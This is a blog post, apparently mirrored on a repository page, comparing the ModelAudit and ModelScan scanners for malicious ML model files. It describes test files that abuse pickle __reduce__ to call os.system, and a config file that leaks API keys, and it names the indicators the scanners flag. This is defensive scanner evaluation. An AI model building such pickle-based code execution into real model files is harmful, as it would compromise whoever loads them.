Are you sure you want to delete this access key?
title | description | image | date | authors | tags |
---|---|---|---|---|---|
ModelAudit vs ModelScan: Comparing ML Model Security Scanners | Compare ModelAudit and ModelScan for ML model security scanning. Learn how comprehensive format support and detection capabilities differ between these tools. | /img/blog/modelaudit/modelaudit-vs-modelscan.jpg | 2025-07-06 | [ian] | [tool-comparison best-practices] |
As organizations increasingly adopt machine learning models from various sources, ensuring their security has become critical. Two tools have emerged to address this need: Promptfoo's ModelAudit and Protect AI's ModelScan.
To help security teams understand their options, we conducted an comparison using 11 test files containing documented security vulnerabilities. The setup of this comparison is entirely open-source and can be accessed on Github.
Our comparison focused on real-world attack vectors commonly found in ML model supply chains:
Each test file was scanned with both tools (ModelAudit v0.1.0 and ModelScan v0.8.5) in June 2025, with results independently verified.
The tools differ significantly in the number of file formats they can analyze:
Metric | ModelAudit | ModelScan |
---|---|---|
Files analyzed | 11/11 (100%) | 6/11 (55%) |
Pickle files | 5/5 | 4/5 |
Configuration files | 3/3 | 0/3 |
Archive files | 2/2 | 2/2 |
Other formats | 1/1 | 0/1 |
ModelScan focuses primarily on pickle-based formats (including PyTorch .pt/.pth files), Keras H5 files, and TensorFlow SavedModel directories. ModelAudit additionally supports configuration files (JSON, YAML, XML), ONNX models, SafeTensors, NumPy arrays, and PMML files.
Across the 11 test files, the scanners identified different numbers of security issues:
Metric | ModelAudit | ModelScan |
---|---|---|
Total issues detected | 16 | 3 |
Files with detections | 8 | 3 |
Average issues per malicious file | 2.0 | 1.0 |
Both tools successfully detected malicious pickle files. For a file containing os.system
execution via __reduce__
:
posix.system
referenceREDUCE
opcode and the posix.system
referenceThis pattern repeated across other pickle test cases, with ModelAudit typically identifying both the execution mechanism and the dangerous function call.
Only ModelAudit currently analyzes configuration files. In our test of a malicious JSON configuration file containing webhook URLs, exposed API keys, and executable code patterns, ModelAudit identified 4 distinct security issues while ModelScan could not process the file.
Both tools support ZIP file scanning, but with different security checks:
Both tools provide:
Notable differences:
Model Audit is also not just a CLI - it comes with an optional UI via the promptfoo
package:
For organizations implementing ML security scanning:
Format diversity: Teams using multiple ML frameworks or configuration-driven pipelines may need broader format support
Detection depth: The difference in detection counts (16 vs 3 issues) reflects different approaches to identifying security risks
Integration requirements: Both tools offer CLI and JSON output suitable for CI/CD pipelines
Complementary use: Some organizations might benefit from using both tools for different stages of their ML pipeline
All test files and comparison scripts are available on Github for independent verification:
# Generate test files
python generate_test_models.py
# Run comparison
python run_comparison_fixed.py
# View results
cat results/summary_fixed.json
ModelScan provides focused pickle security scanning, while ModelAudit offers broader format coverage and additional security checks. Organizations should evaluate their specific needs, including the ML frameworks they use, the types of models they deploy, and their security requirements when choosing between these tools.
The empirical data from our testing provides a baseline for comparison, but each organization's needs will vary based on their ML infrastructure and threat model. We encourage teams to test both tools with their own model formats and security requirements to make an informed decision.
Note: This comparison used ModelAudit v0.1.0 and ModelScan v0.8.5. Both tools are under active development, and capabilities may change in future versions.
Press p or to see the previous file or, n or to see the next file
Browsing data directories saved to S3 is possible with DAGsHub. Let's configure your repository to easily display your data in the context of any commit!
promptfoo is now integrated with AWS S3!
Are you sure you want to delete this access key?
Browsing data directories saved to Google Cloud Storage is possible with DAGsHub. Let's configure your repository to easily display your data in the context of any commit!
promptfoo is now integrated with Google Cloud Storage!
Are you sure you want to delete this access key?
Browsing data directories saved to Azure Cloud Storage is possible with DAGsHub. Let's configure your repository to easily display your data in the context of any commit!
promptfoo is now integrated with Azure Cloud Storage!
Are you sure you want to delete this access key?
Browsing data directories saved to S3 compatible storage is possible with DAGsHub. Let's configure your repository to easily display your data in the context of any commit!
promptfoo is now integrated with your S3 compatible storage!
Are you sure you want to delete this access key?